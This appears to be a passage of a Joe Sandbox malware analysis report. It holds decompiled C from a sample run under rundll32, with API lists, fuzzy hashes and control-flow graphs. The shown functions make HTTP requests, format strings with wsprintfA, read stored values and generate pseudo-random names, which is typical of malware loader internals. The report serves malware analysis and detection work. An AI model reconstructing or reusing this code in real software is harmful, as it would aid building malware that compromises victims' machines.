                    • SafeArrayDestroy.OLEAUT32(?), ref: 04441FC9
                    • SysFreeString.OLEAUT32(?), ref: 04441FD7
                      • Part of subcall function 044456CF: Sleep.KERNEL32(000001F4), ref: 04445717
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                    • String ID:
                    • API String ID: 2118684380-0
                    • Opcode ID: b36c7af522cbf22bde372d8e1c46cf1113afdfd00964bf4b4ad518dfa151288b
                    • Instruction ID: 67fe736a7419ed8be65b8b988537eef0425cabd7ffa71fe22890f54c4cf76fae
                    • Opcode Fuzzy Hash: b36c7af522cbf22bde372d8e1c46cf1113afdfd00964bf4b4ad518dfa151288b
                    • Instruction Fuzzy Hash: DD510E76900209AFEF11DFA4C8888AEB7B6FFC8344B158929E515EB210D735AD46CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 377 44443d8-44443e7 378 44443e9-44443f9 call 444395b 377->378 379 44443fb-44443ff call 4447a34 377->379 378->379 384 444444a GetLastError 378->384 383 4444404-4444406 379->383 385 4444445-4444448 383->385 386 4444408-444442d ResetEvent * 2 HttpSendRequestA 383->386 387 444444c-444444e 384->387 385->384 385->387 388 444442f-4444436 GetLastError 386->388 389 444443a-444443d SetEvent 386->389 388->385 390 4444438 388->390 391 4444443 389->391 390->391 391->385
                    C-Code - Quality: 100%
                    			E044443D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                    				void* __esi;
                    				long _t10;
                    				void* _t18;
                    				void* _t22;
                    
                    				_t9 = __eax;
                    				_t22 = __eax;
                    				if(_a4 != 0 && E0444395B(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                    					L9:
                    					return GetLastError();
                    				}
                    				_t10 = E04447A34(_t9, _t18, _t22, _a8); // executed
                    				if(_t10 == 0) {
                    					ResetEvent( *(_t22 + 0x1c));
                    					ResetEvent( *(_t22 + 0x20));
                    					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                    						SetEvent( *(_t22 + 0x1c));
                    						goto L7;
                    					} else {
                    						_t10 = GetLastError();
                    						if(_t10 == 0x3e5) {
                    							L7:
                    							_t10 = 0;
                    						}
                    					}
                    				}
                    				if(_t10 == 0xffffffff) {
                    					goto L9;
                    				}
                    				return _t10;
                    			}








                    APIs
                    • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04441AE3,?,?,00000000,00000000), ref: 04444412
                    • ResetEvent.KERNEL32(?), ref: 04444417
                    • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 04444424
                    • GetLastError.KERNEL32 ref: 0444442F
                    • GetLastError.KERNEL32(?,?,00000102,04441AE3,?,?,00000000,00000000), ref: 0444444A
                      • Part of subcall function 0444395B: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,044443F7,?,?,?,?,00000102,04441AE3,?,?,00000000), ref: 04443967
                      • Part of subcall function 0444395B: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,044443F7,?,?,?,?,00000102,04441AE3,?), ref: 044439C5
                      • Part of subcall function 0444395B: lstrcpy.KERNEL32(00000000,00000000), ref: 044439D5
                    • SetEvent.KERNEL32(?), ref: 0444443D
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                    • String ID:
                    • API String ID: 3739416942-0
                    • Opcode ID: b8f45e9528d3eb86810c1e9801d5ef2b3b8f79003d1591cc91d7cc5ea795298b
                    • Instruction ID: 2ebf105dbfb4e0ffc899834781d0d056591c2e7474644492b478dfa5a91c98f8
                    • Opcode Fuzzy Hash: b8f45e9528d3eb86810c1e9801d5ef2b3b8f79003d1591cc91d7cc5ea795298b
                    • Instruction Fuzzy Hash: 97016D31204200ABFF316F71DC46F5B7AA8EFC4729F20462AF551A21E0DB20F805EA61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 392 4443a12-4443a57 wsprintfA 393 4443a59-4443a61 RtlAllocateHeap 392->393 394 4443a7b-4443a83 RtlAllocateHeap 392->394 396 4443aa0 393->396 397 4443a63-4443a74 call 4442fc4 393->397 395 4443a85-4443a96 call 44468eb 394->395 394->396 402 4443a9b-4443a9e 395->402 400 4443aa7-4443aab 396->400 401 4443a79 397->401 403 4443ae5 400->403 404 4443aad-4443ac8 call 44452a9 call 4444dc8 400->404 401->402 402->400 405 4443aeb-4443af2 403->405 410 4443af5-4443b06 404->410 411 4443aca-4443ad9 call 4445f6a 404->411 410->405 412 4443b08-4443b0f 410->412 411->403 412->405
                    C-Code - Quality: 65%
                    			E04443A12(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                    				void* _v8;
                    				char _v48;
                    				void* __edi;
                    				intOrPtr _t22;
                    				intOrPtr _t30;
                    				intOrPtr _t37;
                    				void* _t38;
                    				intOrPtr* _t43;
                    				void* _t44;
                    				void* _t48;
                    				intOrPtr* _t49;
                    				void* _t50;
                    				intOrPtr _t51;
                    
                    				_t48 = __edx;
                    				_t44 = __ecx;
                    				_t43 = _a16;
                    				_t49 = __eax;
                    				_t22 =  *0x444a320; // 0xafd5a8
                    				_t2 = _t22 + 0x444b682; // 0x657a6973
                    				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
                    				_t51 =  *0x444a3e0; // 0x4f49b60
                    				_push(0x800);
                    				_push(0);
                    				_push( *0x444a2d8);
                    				if( *0x444a2ec >= 5) {
                    					if(RtlAllocateHeap() == 0) {
                    						L6:
                    						_a4 = 8;
                    						L7:
                    						if(_a4 != 0) {
                    							L10:
                    							 *0x444a2ec =  *0x444a2ec + 1;
                    							L11:
                    							return _a4;
                    						}
                    						_t52 = _a16;
                    						 *_t49 = _a16;
                    						_t50 = _v8;
                    						 *_t43 = E044452A9(_t52, _t50); // executed
                    						_t30 = E04444DC8(_t50, _t52); // executed
                    						if(_t30 != 0) {
                    							 *_a8 = _t50;
                    							 *_a12 = _t30;
                    							if( *0x444a2ec < 5) {
                    								 *0x444a2ec =  *0x444a2ec & 0x00000000;
                    							}
                    							goto L11;
                    						}
                    						_a4 = 0xbf;
                    						E04445F6A();
                    						RtlFreeHeap( *0x444a2d8, 0, _t50); // executed
                    						goto L10;
                    					}
                    					_t37 = E044468EB(_a4, _t48, _t51,  &_v48,  &_v8,  &_a16, _t26);
                    					L5:
                    					_a4 = _t37;
                    					goto L7;
                    				}
                    				_t38 = RtlAllocateHeap(); // executed
                    				if(_t38 == 0) {
                    					goto L6;
                    				}
                    				_t37 = E04442FC4(_a4, _t44, _t48, _t51,  &_v48,  &_v8,  &_a16, _t38); // executed
                    				goto L5;
                    			}

















                    APIs
                    • wsprintfA.USER32 ref: 04443A34
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04443A59
                      • Part of subcall function 04442FC4: GetTickCount.KERNEL32 ref: 04442FD8
                      • Part of subcall function 04442FC4: wsprintfA.USER32 ref: 04443028
                      • Part of subcall function 04442FC4: wsprintfA.USER32 ref: 04443045
                      • Part of subcall function 04442FC4: wsprintfA.USER32 ref: 04443065
                      • Part of subcall function 04442FC4: wsprintfA.USER32 ref: 04443091
                      • Part of subcall function 04442FC4: HeapFree.KERNEL32(00000000,00000000), ref: 044430A3
                      • Part of subcall function 04442FC4: wsprintfA.USER32 ref: 044430C4
                      • Part of subcall function 04442FC4: HeapFree.KERNEL32(00000000,00000000), ref: 044430D4
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04443A7B
                    • RtlFreeHeap.NTDLL(00000000,?,?), ref: 04443ADF
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: wsprintf$Heap$Free$Allocate$CountTick
                    • String ID: Ut
                    • API String ID: 1428766365-8415677
                    • Opcode ID: 1afa15b8008cb8c7d0abdcf5cf54bf9015e98c13c696a9f01c22bba50de3f0e2
                    • Instruction ID: 657d163d7194208dfe90c9fff9e49b05ae6805741ea8541dd4a4a86b217d61f3
                    • Opcode Fuzzy Hash: 1afa15b8008cb8c7d0abdcf5cf54bf9015e98c13c696a9f01c22bba50de3f0e2
                    • Instruction Fuzzy Hash: 2A31487A640109EBFF11DFA5D884E9B7BACFB88755F008016F902E7280DB35A945DBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 50%
                    			E04441000(void** __esi) {
                    				intOrPtr _v0;
                    				intOrPtr _t4;
                    				intOrPtr _t6;
                    				void* _t8;
                    				void* _t9;
                    				intOrPtr _t10;
                    				void* _t11;
                    				void** _t13;
                    
                    				_t13 = __esi;
                    				_t4 =  *0x444a3cc; // 0x4f495b0
                    				__imp__(_t4 + 0x40);
                    				while(1) {
                    					_t6 =  *0x444a3cc; // 0x4f495b0
                    					_t1 = _t6 + 0x58; // 0x0
                    					if( *_t1 == 0) {
                    						break;
                    					}
                    					Sleep(0xa);
                    				}
                    				_t8 =  *_t13;
                    				if(_t8 != 0 && _t8 != 0x444a030) {
                    					HeapFree( *0x444a2d8, 0, _t8);
                    				}
                    				_t9 = E04443B61(_v0, _t13); // executed
                    				_t13[1] = _t9;
                    				_t10 =  *0x444a3cc; // 0x4f495b0
                    				_t11 = _t10 + 0x40;
                    				__imp__(_t11);
                    				return _t11;
                    			}












                    APIs
                    • RtlEnterCriticalSection.NTDLL(04F49570), ref: 04441009
                    • Sleep.KERNEL32(0000000A), ref: 04441013
                    • HeapFree.KERNEL32(00000000,00000000), ref: 0444103B
                    • RtlLeaveCriticalSection.NTDLL(04F49570), ref: 04441057
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                    • String ID: Ut
                    • API String ID: 58946197-8415677
                    • Opcode ID: 8ef180d1b55acc9aeda1cfe74b51a673b949759f13fbbf7753fd2ce4bfc0093e
                    • Instruction ID: 4952bd85d21f2c696e7a9cf6499a2d7f7ca330184a04a1c9e6e4314426c1967b
                    • Opcode Fuzzy Hash: 8ef180d1b55acc9aeda1cfe74b51a673b949759f13fbbf7753fd2ce4bfc0093e
                    • Instruction Fuzzy Hash: 23F0DAB92402919BFF249F69DC49B177BA4EBC0745B048406F801E7692D739EC90EB25
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 57%
                    			E04446535(signed int __edx) {
                    				signed int _v8;
                    				long _v12;
                    				CHAR* _v16;
                    				long _v20;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t21;
                    				CHAR* _t22;
                    				CHAR* _t25;
                    				intOrPtr _t26;
                    				void* _t27;
                    				void* _t31;
                    				void* _t32;
                    				CHAR* _t36;
                    				CHAR* _t42;
                    				CHAR* _t43;
                    				CHAR* _t44;
                    				void* _t49;
                    				void* _t51;
                    				signed char _t56;
                    				intOrPtr _t58;
                    				signed int _t59;
                    				void* _t63;
                    				CHAR* _t67;
                    				CHAR* _t68;
                    				char* _t69;
                    				void* _t70;
                    
                    				_t61 = __edx;
                    				_v20 = 0;
                    				_v8 = 0;
                    				_v12 = 0;
                    				_t21 = E04444843();
                    				if(_t21 != 0) {
                    					_t59 =  *0x444a2fc; // 0x4000000a
                    					_t55 = (_t59 & 0xf0000000) + _t21;
                    					 *0x444a2fc = (_t59 & 0xf0000000) + _t21;
                    				}
                    				_t22 =  *0x444a178(0, 2); // executed
                    				_v16 = _t22;
                    				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                    					_t25 = E04441649( &_v8,  &_v20); // executed
                    					_t54 = _t25;
                    					_t26 =  *0x444a320; // 0xafd5a8
                    					if( *0x444a2fc > 5) {
                    						_t8 = _t26 + 0x444b5cd; // 0x4d283a53
                    						_t27 = _t8;
                    					} else {
                    						_t7 = _t26 + 0x444b9f5; // 0x44283a44
                    						_t27 = _t7;
                    					}
                    					E04445A2D(_t27, _t27);
                    					_t31 = E0444414A(_t61,  &_v20,  &_v12); // executed
                    					if(_t31 == 0) {
                    						CloseHandle(_v20);
                    					}
                    					_t63 = 5;
                    					if(_t54 != _t63) {
                    						 *0x444a310 =  *0x444a310 ^ 0x81bbe65d;
                    						_t32 = E044463FD(0x60);
                    						__eflags = _t32;
                    						 *0x444a3cc = _t32;
                    						if(_t32 == 0) {
                    							_push(8);
                    							_pop(0);
                    						} else {
                    							memset(_t32, 0, 0x60);
                    							_t49 =  *0x444a3cc; // 0x4f495b0
                    							_t70 = _t70 + 0xc;
                    							__imp__(_t49 + 0x40);
                    							_t51 =  *0x444a3cc; // 0x4f495b0
                    							 *_t51 = 0x444b81a;
                    						}
                    						__eflags = 0;
                    						_t54 = 0;
                    						if(0 == 0) {
                    							_t36 = RtlAllocateHeap( *0x444a2d8, 0, 0x43);
                    							__eflags = _t36;
                    							 *0x444a364 = _t36;
                    							if(_t36 == 0) {
                    								_push(8);
                    								_pop(0);
                    							} else {
                    								_t56 =  *0x444a2fc; // 0x4000000a
                    								_t61 = _t56 & 0x000000ff;
                    								_t58 =  *0x444a320; // 0xafd5a8
                    								_t13 = _t58 + 0x444b55a; // 0x697a6f4d
                    								_t55 = _t13;
                    								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4449287);
                    							}
                    							__eflags = 0;
                    							_t54 = 0;
                    							if(0 == 0) {
                    								asm("sbb eax, eax");
                    								E044421BC( ~_v8 &  *0x444a310, 0x444a00c); // executed
                    								_t42 = E04444EF3(0, _t55, _t63, 0x444a00c); // executed
                    								_t54 = _t42;
                    								__eflags = _t54;
                    								if(_t54 != 0) {
                    									goto L30;
                    								}
                    								_t43 = E04443C10(); // executed
                    								__eflags = _t43;
                    								if(_t43 != 0) {
                    									__eflags = _v8;
                    									_t67 = _v12;
                    									if(_v8 != 0) {
                    										L29:
                    										_t44 = E04445458(_t61, _t67, _v8); // executed
                    										_t54 = _t44;
                    										goto L30;
                    									}
                    									__eflags = _t67;
                    									if(__eflags == 0) {
                    										goto L30;
                    									}
                    									_t54 = E04447576(__eflags,  &(_t67[4]));
                    									__eflags = _t54;
                    									if(_t54 == 0) {
                    										goto L30;
                    									}
                    									goto L29;
                    								}
                    								_t54 = 8;
                    							}
                    						}
                    					} else {
                    						_t68 = _v12;
                    						if(_t68 == 0) {
                    							L30:
                    							if(_v16 == 0 || _v16 == 1) {
                    								 *0x444a17c();
                    							}
                    							goto L34;
                    						}
                    						_t69 =  &(_t68[4]);
                    						do {
                    						} while (E044478DB(_t63, _t69, 0, 1) == 0x4c7);
                    					}
                    					goto L30;
                    				} else {
                    					_t54 = _t22;
                    					L34:
                    					return _t54;
                    				}
                    			}
































                    APIs
                      • Part of subcall function 04444843: GetModuleHandleA.KERNEL32(4C44544E,00000000,0444654D,00000001), ref: 04444852
                    • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 044465CA
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • memset.NTDLL ref: 0444661A
                    • RtlInitializeCriticalSection.NTDLL(04F49570), ref: 0444662B
                      • Part of subcall function 04447576: memset.NTDLL ref: 04447590
                      • Part of subcall function 04447576: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 044475D6
                      • Part of subcall function 04447576: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 044475E1
                    • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04446656
                    • wsprintfA.USER32 ref: 04446686
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                    • String ID:
                    • API String ID: 4246211962-0
                    • Opcode ID: 245d074093a1218ade2224a7ab5b94aa586265e5c8a8db1db65eeb9ac36e9c87
                    • Instruction ID: fc1387889d4b4bad0e9dcaaea5a57f8bacf839158e2d49f7a7b7862d317d7bc4
                    • Opcode Fuzzy Hash: 245d074093a1218ade2224a7ab5b94aa586265e5c8a8db1db65eeb9ac36e9c87
                    • Instruction Fuzzy Hash: 5551D071B40225ABFF209FA5E844B6F77A8EBC6704F01442BE501E7241EABCB9449B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 22%
                    			E044437CE(signed int __eax, signed int _a4, signed int _a8) {
                    				signed int _v8;
                    				signed int _v12;
                    				intOrPtr _v16;
                    				signed int _v20;
                    				intOrPtr _t81;
                    				char _t83;
                    				signed int _t90;
                    				signed int _t97;
                    				signed int _t99;
                    				char _t101;
                    				unsigned int _t102;
                    				intOrPtr _t103;
                    				char* _t107;
                    				signed int _t110;
                    				signed int _t113;
                    				signed int _t118;
                    				signed int _t122;
                    				intOrPtr _t124;
                    
                    				_t102 = _a8;
                    				_t118 = 0;
                    				_v20 = __eax;
                    				_t122 = (_t102 >> 2) + 1;
                    				_v8 = 0;
                    				_a8 = 0;
                    				_t81 = E044463FD(_t122 << 2);
                    				_v16 = _t81;
                    				if(_t81 == 0) {
                    					_push(8);
                    					_pop(0);
                    					L37:
                    					return 0;
                    				}
                    				_t107 = _a4;
                    				_a4 = _t102;
                    				_t113 = 0;
                    				while(1) {
                    					_t83 =  *_t107;
                    					if(_t83 == 0) {
                    						break;
                    					}
                    					if(_t83 == 0xd || _t83 == 0xa) {
                    						if(_t118 != 0) {
                    							if(_t118 > _v8) {
                    								_v8 = _t118;
                    							}
                    							_a8 = _a8 + 1;
                    							_t118 = 0;
                    						}
                    						 *_t107 = 0;
                    						goto L16;
                    					} else {
                    						if(_t118 != 0) {
                    							L10:
                    							_t118 = _t118 + 1;
                    							L16:
                    							_t107 = _t107 + 1;
                    							_t15 =  &_a4;
                    							 *_t15 = _a4 - 1;
                    							if( *_t15 != 0) {
                    								continue;
                    							}
                    							break;
                    						}
                    						if(_t113 == _t122) {
                    							L21:
                    							if(_a8 <= 0x20) {
                    								_push(0xb);
                    								L34:
                    								_pop(0);
                    								L35:
                    								E044417AB(_v16);
                    								goto L37;
                    							}
                    							_t24 = _v8 + 5; // 0xcdd8d2f8
                    							_t103 = E044463FD((_v8 + _t24) * _a8 + 4);
                    							if(_t103 == 0) {
                    								_push(8);
                    								goto L34;
                    							}
                    							_t90 = _a8;
                    							_a4 = _a4 & 0x00000000;
                    							_v8 = _v8 & 0x00000000;
                    							_t124 = _t103 + _t90 * 4;
                    							if(_t90 <= 0) {
                    								L31:
                    								 *0x444a318 = _t103;
                    								goto L35;
                    							}
                    							do {
                    								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
                    								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
                    								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
                    								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
                    								_v12 = _v12 & 0x00000000;
                    								if(_a4 <= 0) {
                    									goto L30;
                    								} else {
                    									goto L26;
                    								}
                    								while(1) {
                    									L26:
                    									_t99 = _v12;
                    									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
                    									if(_t99 == 0) {
                    										break;
                    									}
                    									_v12 = _v12 + 1;
                    									if(_v12 < _a4) {
                    										continue;
                    									}
                    									goto L30;
                    								}
                    								_v8 = _v8 - 1;
                    								L30:
                    								_t97 = _a4;
                    								_a4 = _a4 + 1;
                    								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
                    								__imp__(_t124);
                    								_v8 = _v8 + 1;
                    								_t124 = _t124 + _t97 + 1;
                    							} while (_v8 < _a8);
                    							goto L31;
                    						}
                    						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
                    						_t101 = _t83;
                    						if(_t83 - 0x61 <= 0x19) {
                    							_t101 = _t101 - 0x20;
                    						}
                    						 *_t107 = _t101;
                    						_t113 = _t113 + 1;
                    						goto L10;
                    					}
                    				}
                    				if(_t118 != 0) {
                    					if(_t118 > _v8) {
                    						_v8 = _t118;
                    					}
                    					_a8 = _a8 + 1;
                    				}
                    				goto L21;
                    			}






















                    APIs
                      • Part of subcall function 044463FD: RtlAllocateHeap.NTDLL(00000000,00000000,044428D5), ref: 04446409
                    • lstrcpy.KERNEL32(69B25F45,00000020), ref: 044438CB
                    • lstrcat.KERNEL32(69B25F45,00000020), ref: 044438E0
                    • lstrcmp.KERNEL32(00000000,69B25F45), ref: 044438F7
                    • lstrlen.KERNEL32(69B25F45), ref: 0444391B
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                    • String ID:
                    • API String ID: 3214092121-3916222277
                    • Opcode ID: 1cf2bc5645240097ead0f30abf7fb17a4ee227142a954a50c5c58aac9eb21d9a
                    • Instruction ID: bb2f0bfc7b7ebb305cb2b7c7b5396e208f5d4e4817e95226dcfe80aea78dbfd6
                    • Opcode Fuzzy Hash: 1cf2bc5645240097ead0f30abf7fb17a4ee227142a954a50c5c58aac9eb21d9a
                    • Instruction Fuzzy Hash: 4A517A71B00608EBEF25CF99C4856AEFBB6FF95B24F15805BEC55AB201D730AA51CB40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E04443399(void* __edx) {
                    				void* _v8;
                    				int _v12;
                    				WCHAR* _v16;
                    				void* __edi;
                    				void* __esi;
                    				void* _t23;
                    				intOrPtr _t24;
                    				void* _t26;
                    				intOrPtr _t32;
                    				intOrPtr _t35;
                    				void* _t37;
                    				intOrPtr _t38;
                    				intOrPtr _t42;
                    				void* _t45;
                    				void* _t50;
                    				void* _t52;
                    
                    				_t50 = __edx;
                    				_v12 = 0;
                    				_t23 = E044440C7(0,  &_v8); // executed
                    				if(_t23 != 0) {
                    					_v8 = 0;
                    				}
                    				_t24 =  *0x444a320; // 0xafd5a8
                    				_t4 = _t24 + 0x444be30; // 0x4f493d8
                    				_t5 = _t24 + 0x444bdd8; // 0x4f0053
                    				_t26 = E04442985( &_v16, _v8, _t5, _t4); // executed
                    				_t45 = _t26;
                    				if(_t45 == 0) {
                    					StrToIntExW(_v16, 0,  &_v12);
                    					_t45 = 8;
                    					if(_v12 < _t45) {
                    						_t45 = 1;
                    						__eflags = 1;
                    					} else {
                    						_t32 =  *0x444a320; // 0xafd5a8
                    						_t11 = _t32 + 0x444be24; // 0x4f493cc
                    						_t48 = _t11;
                    						_t12 = _t32 + 0x444bdd8; // 0x4f0053
                    						_t52 = E0444114D(_t11, _t12, _t11);
                    						_t59 = _t52;
                    						if(_t52 != 0) {
                    							_t35 =  *0x444a320; // 0xafd5a8
                    							_t13 = _t35 + 0x444be6e; // 0x30314549
                    							_t37 = E04445231(_t48, _t50, _t59, _v8, _t52, _t13, 0x14); // executed
                    							if(_t37 == 0) {
                    								_t61 =  *0x444a2fc - 6;
                    								if( *0x444a2fc <= 6) {
                    									_t42 =  *0x444a320; // 0xafd5a8
                    									_t15 = _t42 + 0x444bdba; // 0x52384549
                    									E04445231(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
                    								}
                    							}
                    							_t38 =  *0x444a320; // 0xafd5a8
                    							_t17 = _t38 + 0x444be68; // 0x4f49410
                    							_t18 = _t38 + 0x444be40; // 0x680043
                    							_t45 = E044434EE(_v8, 0x80000001, _t52, _t18, _t17);
                    							HeapFree( *0x444a2d8, 0, _t52);
                    						}
                    					}
                    					HeapFree( *0x444a2d8, 0, _v16);
                    				}
                    				_t54 = _v8;
                    				if(_v8 != 0) {
                    					E04444B59(_t54);
                    				}
                    				return _t45;
                    			}




















                    APIs
                    • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04F493D8,00000000,?,74E5F710,00000000,74E5F730), ref: 044433E8
                    • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04F49410,?,00000000,30314549,00000014,004F0053,04F493CC), ref: 04443485
                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,044454F9), ref: 04443497
                    Strings
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: Ut
                    • API String ID: 3298025750-8415677
                    • Opcode ID: 3d6d0b77b389be16fae7f45187fb8032b2d9a415f64b9c2e15fca22ea83c8c56
                    • Instruction ID: e4691deca3fe0ab750c794b35bc1707de10dbe8ca3e36a657dc7e80d38f3839d
                    • Opcode Fuzzy Hash: 3d6d0b77b389be16fae7f45187fb8032b2d9a415f64b9c2e15fca22ea83c8c56
                    • Instruction Fuzzy Hash: E9316F76A00148BFFF129FE1DC45E9EB7BCEBC9704F1400AABA00AB151D671BE189B50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • SysAllocString.OLEAUT32(80000002), ref: 0444153B
                    • SysAllocString.OLEAUT32(04442BCC), ref: 0444157E
                    • SysFreeString.OLEAUT32(00000000), ref: 04441592
                    • SysFreeString.OLEAUT32(00000000), ref: 044415A0
                    Memory Dump Source
                    • Source File: 00000009.00000002.811379004.0000000004441000.00000020.00020000.sdmp, Offset: 04440000, based on PE: true
                    • Associated: 00000009.00000002.811366960.0000000004440000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811397699.0000000004449000.00000002.00020000.sdmp
                    • Associated: 00000009.00000002.811410865.000000000444A000.00000004.00020000.sdmp
                    • Associated: 00000009.00000002.811440932.000000000444C000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_9_2_4440000_rundll32.jbxd
                    Similarity
                    • API ID: String$AllocFree
                    • String ID:
                    • API String ID: 344208780-0
                    • Opcode ID: bace32b088ce8cae95d0536e8da7b82004bd3ca6d4f233036a2e5154d451cd73
                    • Instruction ID: 9da91bbf1b794659d26c7c5e49874800284525124e799227f5bca2da04c0d96d
                    • Opcode Fuzzy Hash: bace32b088ce8cae95d0536e8da7b82004bd3ca6d4f233036a2e5154d451cd73
                    • Instruction Fuzzy Hash: 1131EAB6900209EFDB05DF99D4848EE7BB5FF88340B14842EF50AA7210E735AA85CF61
                    Uniqueness

                    Uniqueness Score: -1.00%

